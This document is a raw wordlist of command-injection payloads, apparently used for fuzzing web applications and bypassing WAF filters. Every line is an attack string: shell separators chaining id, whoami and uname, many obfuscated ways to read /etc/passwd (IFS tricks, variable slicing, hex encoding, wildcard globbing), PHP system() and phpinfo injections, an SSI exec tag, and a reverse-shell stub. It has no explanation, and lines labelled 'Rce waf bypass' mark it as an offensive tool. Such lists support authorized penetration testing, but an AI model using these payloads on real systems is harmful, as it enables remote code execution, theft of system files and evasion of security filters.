"
",
",system('ls');" double quote Rce filter bypass
";cat+/etc/passwd+#
"i"d
$(/usr/bin/id)
$(`cat /etc/passwd`)
$(cat /e${hahaha}tc/${heywaf}pas${catchthis}swd)
$(cat$IFS/etc/passwd)
$(cat$u /etc$u/passwd$u)
$(cat%20/etc/passwd)
$(cat</etc/passwd)
$(echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd)
$(id)
$({cat,/etc/passwd})
$;id
${@phpinfo()}
${@system("id")} eval code bypass
${PATH##*s????}${PATH%%u*}bas${u}h${IFS}${PHP_CFLAGS%%f*}c${IFS}l${u}s
${PATH##*s????}${PATH%%u*}c??${IFS}${PATH%%u*}e??${PATH%%u*}??ss??
${PATH##*s????}${PATH%%u*}ca${u}t${IFS}${PATH%%u*}et${u}c${PATH%%u*}pas${u}swd
${PATH:0:1}bi?${PATH:0:1}ca?${IFS}${PATH:0:1}et?${PATH:0:1}??sswd
&
&&/usr/bin/id&&
&&cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
&&cat$IFS/etc/passwd
&&cat$u /etc$u/passwd$u
&&cat%20/etc/passwd
&&cat</etc/passwd
&&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
&&{cat,/etc/passwd}
&/usr/bin/id&
&cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
&cat$IFS/etc/passwd
&cat$u /etc$u/passwd$u
&cat%20/etc/passwd
&cat</etc/passwd
&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
&lt;!--#exec%20cmd=&quot;id;--&gt;
&{cat,/etc/passwd}
'
''
'i'd
(
(sy.(st).em)(whoami);
)
*
,
/*$(id)`id`
/*$(id)`id``*/-id-'/*$(id)`id` #*/-id||'"||id||"/*`*/
/*$(id)`id``*/id'/*$(id)`id` #*/id||'"||id||"/*`*/
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
/bin$u/bash$u <ip> <port>
127.0.0.1;i"d
127.0.0.1;ls
1;uname${IFS}-a
1;uname${IFS}-a;#
1;uname${IFS}-a;#${IFS}'
1;uname${IFS}-a;#${IFS}';
;
;"
;${@print(md5("whoami"))}
;${@print(md5(whoami))}
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
;+cat+/e'tc/pass'wd
;/usr/bin/id;
;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
;cat$IFS/etc/passwd
;cat$u /etc$u/passwd$u
;cat$u+/etc$u/passwd$u
;cat%20/etc/passwd
;cat+/etc/passwd
;cat+/etc/passwd+#
;cat</etc/passwd
;echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
;l"s${IFS}-la
;phpinfo
;phpinfo();
;system('cat%20/etc/passwd')
;system('id')
;unam"e${IFS}-a
;{cat,/etc/passwd}
<!--#exec cmd="id;-->
<?php system("cat /etc/passwd");?>
IFS=,;`cat<<<cat,/etc/passwd`
IFS=];b=cat]/etc/passwd;$b
\
\u\n\a\m\e \-\a
`
`/usr/bin/id`
`cat /e${hahaha}tc/${heywaf}pas${catchthis}swd`
`cat$IFS/etc/passwd`
`cat$u /etc$u/passwd$u`
`cat%20/etc/passwd`
`cat</etc/passwd`
`echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd`
`{cat,/etc/passwd}`
c${a}at${IFS}${APACHE_CONFDIR%apache2}pas${s}swd
c${u}at${IFS}${PHP_INI_DIR%%u*p}e${u}tc${PHP_INI_DIR%%u*p}p${u}asswd
c\\a\\t+/et\\c/pas\\swd
ca${jjj}t${IFS}${APACHE_RUN_DIR%???????????????}et${jjj}c${APACHE_RUN_DIR%???????????????}pas${jjj}swd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat /etc$u/passwd
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p <<< 2f6574632f706173737764`
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
cat$IFS/etc/passwd
cat$u /etc$u/passwd$u
cat$u+/etc$u/passwd$u
cat${IFS}${PATH%%u*}etc${PATH%%u*}passwd
cat${IFS}/etc/passwd
i$(u)d
i`u`d
id&&whoami;
id&whoami;
id|whoami;
id||whoami;
php -r 'var_dump(exec("id"));'
system('cat /etc/passwd');
system('ls')
tail${IFS}${APACHE_CONFDIR%${APACHE_CONFDIR#?}}et?${APACHE_CONFDIR%${APACHE_CONFDIR#?}}pas?wd
uname${IFS}-a
w${u}h${u}o${u}a${u}m${u}i
whoami
{uname,-a}
{{ get_user_file("/etc/passwd") }}
|
|/usr/bin/id|
|cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
|cat$IFS/etc/passwd
|cat$u /etc$u/passwd$u
|cat%20/etc/passwd
|cat</etc/passwd
|echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
|uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+#  Rce waf bypass
|{cat,/etc/passwd}
||/usr/bin/id||
||cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
||cat$IFS/etc/passwd
||cat$u /etc$u/passwd$u
||cat%20/etc/passwd
||cat</etc/passwd
||echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
||{cat,/etc/passwd}
